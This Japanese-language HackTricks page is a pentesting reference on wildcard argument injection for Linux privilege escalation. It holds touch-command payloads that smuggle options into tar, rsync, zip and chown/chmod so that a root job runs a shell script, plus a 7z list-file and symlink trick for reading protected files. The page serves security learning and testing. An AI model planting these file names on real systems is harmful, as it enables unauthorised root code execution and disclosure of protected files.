hacktricks/linux-hardening/privilege-escalation/wildcards-spare-tricks.md
2023-07-07 23:42:27 +00:00

6.5 KiB
Raw Blame History

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

chown、chmod

他のファイルにコピーするファイルの所有者とアクセス許可を指定することができます。

touch "--reference=/my/own/path/filename"

これを利用することができます https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (組み合わせ攻撃)
__詳細はこちら https://www.exploit-db.com/papers/33930

Tar

任意のコマンドを実行する:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

これを利用することができます https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar攻撃)
__詳細はhttps://www.exploit-db.com/papers/33930を参照してください

Rsync

任意のコマンドを実行する:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

この脆弱性は、https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (rsync攻撃) を使用して悪用することができます。
__詳細はhttps://www.exploit-db.com/papers/33930を参照してください。

7z

7zでは、*の前に--を使用しても(--は、次の入力がパラメータとして処理されないことを意味し、この場合はファイルパスのみです、任意のエラーを引き起こしてファイルを読み取ることができます。したがって、次のようなコマンドがrootによって実行されている場合、悪用することができます。

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

そして、この実行中のフォルダにファイルを作成することができます。@root.txtというファイルと、ファイルroot.txtを作成できます。root.txtは、読み取りたいファイルへのシンボリックリンクです。

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

その後、7zが実行されると、root.txtを圧縮すべきファイルのリストを含むファイルとして扱います(これが@root.txtの存在を示しています。そして、7zがroot.txtを読み込むと、/file/you/want/to/readを読み込みますが、このファイルの内容がファイルのリストではないため、エラーが発生します

詳細は、HackTheBoxのCTFのWrite-upsを参照してください。

Zip

任意のコマンドを実行する:

zip name.zip files -T --unzip-command "sh -c whoami"

__

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥